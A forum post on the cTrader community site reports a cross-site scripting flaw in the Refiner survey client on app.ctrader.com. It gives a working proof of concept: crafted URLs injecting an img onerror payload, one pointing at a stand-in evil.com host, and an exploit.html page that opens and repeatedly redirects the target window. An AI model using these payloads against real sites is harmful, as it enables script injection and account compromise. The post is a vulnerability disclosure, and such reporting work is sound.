XSS in https://app.ctrader.com

Created at 03 Apr 2025, 09:17
Subscribe
How’s your experience with the cTrader Platform?
Your feedback is crucial to cTrader's development. Please take a few seconds to share your opinion and help us improve your trading experience. Thanks!
MI

missoumozil

Follow

Joined 02.04.2025

XSS in https://app.ctrader.com
03 Apr 2025, 09:17

hey sec team

there is an xss in ctrader platfrom, the issue lays in refiner survey js client.

 

see the POC:

https://ctrader.com/?refiner_debug=true&/#refiner_locale=%3Cimg%20src=x%20onerror=alert(origin)%3E&refiner_preview=http://evil.com

run the following code in exploit.html

<html>
<script>
let win = window.open('https://app.ctrader.com/?refiner_debug=true&refiner_preview=true#refiner_locale=%3Cimg%20src=x%20onerror=alert(origin)%3E')
setInterval(()=>{
   win.location.replace('https://app.ctrader.com/?refiner_debug=true&refiner_preview=true#refiner_locale=<img src=x onerror=alert(1)>')
},1)
</script>
</html>
@missoumozil
Copyright © 2025 Spotware Systems Ltd. All rights reserved.
cTrader Ltd offers through its group of companies the cTrader platform. The information on this website is for general informational purposes only and does not constitute financial or investment advice. cTrader does not solicit retail investors. Reliance on this information is at your own risk.